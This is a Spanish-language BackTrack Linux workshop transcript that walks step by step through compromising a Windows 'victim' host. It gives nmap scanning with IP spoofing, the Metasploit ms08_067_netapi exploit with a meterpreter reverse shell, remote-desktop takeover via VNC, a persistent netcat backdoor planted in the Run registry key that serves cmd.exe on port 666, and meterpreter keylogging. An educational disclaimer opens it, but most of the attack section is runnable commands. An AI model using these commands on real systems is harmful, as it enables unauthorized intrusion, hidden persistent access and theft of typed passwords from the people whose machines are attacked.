Taller Backtrack
-
Upload
progresivedeath -
Category
Documents
-
view
3.731 -
download
1
description
Transcript of Taller Backtrack
Taller Backtrack Linux
[*] Presentacion
[*] Disclaimer
[*] Que es Backtrack?
[*] Tools
[*] Habilitacion de Servicios
[*] Taller
– Footprinting
– Scanning
– Exploiting vulnerabilities
– Habilitar Escritorio remoto
– BackDoor
– Keylogger
[*] Links de Interes
[*] DisclaimerTaller de backtrack se hace solo con fines exclusivamente educativos, para motivar el movimiento del software libre, Tambien mostrar que tan vulnerables son los S.O y sus servicios. Los desarrolladores de este taller no se hacen responsables del futuro uso de conocimientos y habilidades adquiridas en el taller.
[*] Que es BacktrackEs una distribucion Gnu/Linux basada en ubuntu (la version 4), las versiones 1 2 3 estan basadas en slax, esta distro esta Enfocada hacia el area de seguridad informatica y pentest. Esta gran plataforma fue desarrollada por los muchach@s de remote-exploit.
[*] ToolsInformatio Gathering
Networking mapping
Vulnerability Identification
Web application Analysis
Radio network analysis
penetration
Privilege Escalation
Maintaining Access
Digital Forensics
Reverse Engieneering
Voive Over IP
Misecellaneous
[*] Habilitacion de serviciosHabilitando Tarjetas de red
• ifup eth0• ifconfig eth0 – dhclient eth0• ifconfig wlan0 – wicd – GUI wicd manager
Habilitando servidor apache
• /etc/init.d/apache2 start | stop
Habilitando Servidor SSH
• /etc/init.d/ssh start | stop• sshd generate
[*] Taller
Host A ------> VictimaHost B ------> Atacante
-FootprintingEste paso es donde llevaremos acabo el reconocimiento del host A.
1# Netcat
Colocaremos el netcat a la escucha de nuestro puerto 80 y con un poco de ingienieria social haremos que el host A se conecte al host B por medio cualquier Navegador.
HOST Broot@bt:# nc -vlp 80
HOST A
HOST B
2# Lanmap
Lanmap como el mismo nombre lo dice LAN – MAP lo que hace es graficar la red LAN donde estamos ubicados, de acuerdo a solucitudes que hace los dispositivos tanto intermedios (routers, switchs, etc) como finales (computadores, impresoras, telefonos IP, etc) daran una respuesta y al dar su respuesta el lanmap la recibira y graficara la LAN. De alli tambien podremos verificar que tipo de S.O tienen los demas hosts en la LAN.
HOST B
root@bt:# lanmap -v -i wlan | eth0 -r 30 -T png -o /root/
en la sintaxis definimos la interface por donde estamos conectados damos un tiempo de respuesta, el formato de salida de la imagen .PNG y el directorio donde sera guardado.
Aquí podremos ver el host A :), con esto nos podremos ubicar como esta estructurada la LAN donde estamos, despues que veamos que la imagen esta practicamente totalmente hecha prodemos ver nuestra shell donde ejecutamos el lanmap y alli podremos ver mas caracateristicas (ttl de cada host, direccion MAC , etc).
-ScanningEste paso es donde veremos que puertos tiene habilitados y con que servicio se esta ejecutando, tambiem podremos partir de a las respuesta que nos de nuestro host A para ver que S.O esta corriendo en el.
1#nmap
nmap es una herramienta que nos permite escanear puertos, hacer detencion del sistema operativo, entre otras muchas utilidades.lo que haremos ahorita sera hacer un escaneo activo para verificar que puertos tiene habilitados, que servicio se esta ejecutando, hacer dentecion del sistema operativo y hacer ip spoofing.
nmap -e eth0 -PN -S <Host_ipspoof> -sV -O <hostA>
en la sintaxix definimos la interface de red que sera eth0 / wlan0 luego activamos la funcion de ping y luego la funcion de spoofing (osea que cuando van a ver la trama de datos y van a ver en el encabezado la ip de provenencia va a aparecer la ip que nostros definamos alli) activamos estas 3 funciones para que cuando cuando se active el escaneo funcione completamente, luego definimos un escaneo de puertos y servicios, por ultimo la detencion del sistema operativo y definimos el host.
Como vemos nos funciono perfectamente, nos muestra que puertos estan habilitados y que S.O esta ejecutandose, para probar que la funcion de spoof esta bien analizaremos la red con el wireshark.
Como vemos aparece en la trama de red cuando lanzamos el escaneo la ip que definimos 25.25.25.25
-Exploiting vulnerabilities
Este metodo que llevaremos acabo lo haremos partiendo de la informacion que hemos obtenido hasta ahora. Bueno como vemos en los puertos habilitados tenemos 2 que son sumamente vulnerables.
Aquí utilizaremos un herramienta llamada metasploit (metasploit es una plataforma donde encotraremos exploits, encoder, auxiliarys y demas herramientas que vienen con si), el termino exploit es un programa que explota las vulnerabilidades de X sistema dentro de dicho exploit se encuentra la shellcode
(la shellcode son lineas de ASM que permite activar shells remotas del sistema y mas propiedades)
Introduccion a metasploit
Tipo de interfaces
Shell
GUI
WEB
Comandos y terminos basicos
payload ----> Tipo de accion la cual se va a realizar si es explotada la vulnerabilidada
exploits ----> Programa para explotar la vulnerabilidad
encoders ----> Algoritmos de ayuda
auxiliary ---> Modulos o tools de msf
set -----> Definir valor
use -----> Definir exploit
run -----> modo de ejecutar los auxiliarys
exploit ---> modo de ejecutar los
sessions ---> mostrar / iniciar sessiones obtenidas con el metasploit
-Explotanto Vulnerabilidad port 445
selecionando Exploit ----> use windows/smb/ms08_067_netapiselecionando payload ----> set payload windows/meterpreter/reverse_tcpselecionando Host Victima –> set RHOST <IP_Victima>selecionando Host Atacante -> set LHOST <IP_Atacker>Ejecutando el Exploit -> exploit
Resultado
Como hemos visto hemos logrado acceder al sistema windows, obtenemos una session de meterpreter (el interprete de windows) y luego ejecutamos un codigo del sistema.
- Habilitar Escritorio remoto
sintaxisrun vnc
lo que se hace aquí es enviarle un es enviarle un server con la propiedad de Escritorio remoto y lo que se hara entablar la conexión y empezar a funcinar como tal el escritorio remoto.
-BackDoorQue es un BackDoor?
*netcatInstalacion de un backdoor
1 subimos de nuestro Host al Host Victima el netcatupload /root/nc.exe C:\\Windows\\System32\\
2 agregamos al registro el nectat en modo escucha
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Lab Backtrack -d 'C:\Windows\System32\nc.exe -L -d -p 666 -e cmd.exe'
3 Reiniciamos el host
reboot
4 metodos de conexión
[*]msf[*]netcat
Conclucionasi cada vez que necesitimos volver a conectarnos al host no tenemos que volver a explotar la vulnerabilidad, solo es cuestion de conectarse.
-KeyloggerQue es un Keylogger
Ejecucion
keyscan_start
keyscan_dump
keyscan_stop
– Links de interes[*] http://www.backtrack-linux.org/[*] http://taxoback.eshost.com.ar/[*] http://www.assasins.com.ar/[*] http://comunidad.dragonjar.org/[*] http://www.antrax-labs.tk/
Taller eleborado por:Kevin David Quiroga Astroz - [Progresive Death]Aprendiz senaLider - Comunidad de Desarrollo Informatico [CDIN]
Contacto:[email protected]